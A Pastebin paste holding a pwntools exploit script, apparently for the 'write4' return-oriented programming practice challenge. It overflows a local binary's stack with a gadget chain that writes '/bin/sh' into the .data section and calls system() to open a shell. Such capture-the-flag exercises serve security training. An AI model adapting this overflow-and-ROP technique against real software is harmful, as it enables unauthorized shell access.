API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 25th, 2019
101
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.94 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. from pwn import *
  4.  
  5. context(arch = 'amd64', os = 'linux')
  6.  
  7. elf = ELF("./write4")
  8. p = process(elf.path)
  9. #p = gdb.debug("/home/manu/Challenges/write4", '''
  10. #break main
  11. #''')
  12.  
  13. # 0x00400820 4d893e mov qword [r14], r15
  14. # 0x00400823 c3 ret
  15.  
  16. # 0x00400890 415e pop r14
  17. # 0x00400892 415f pop r15
  18. # 0x00400894 c3 ret
  19.  
  20. # 0x00400893 5f pop rdi
  21. # 0x00400894 c3 ret
  22.  
  23. # [25] .data PROGBITS 0000000000601050 00001050
  24. # 0000000000000010 0000000000000000 WA 0 0 8
  25.  
  26. pop_rdi_ret = 0x00400893
  27. mov_r14_r15 = 0x00400820
  28. pop14_pop15_ret = 0x00400890
  29. system = 0x4005e0
  30. bin_sh = "/bin/sh\x00"
  31. data_section_writable = 0x601050
  32.  
  33. p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system))
  34. p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!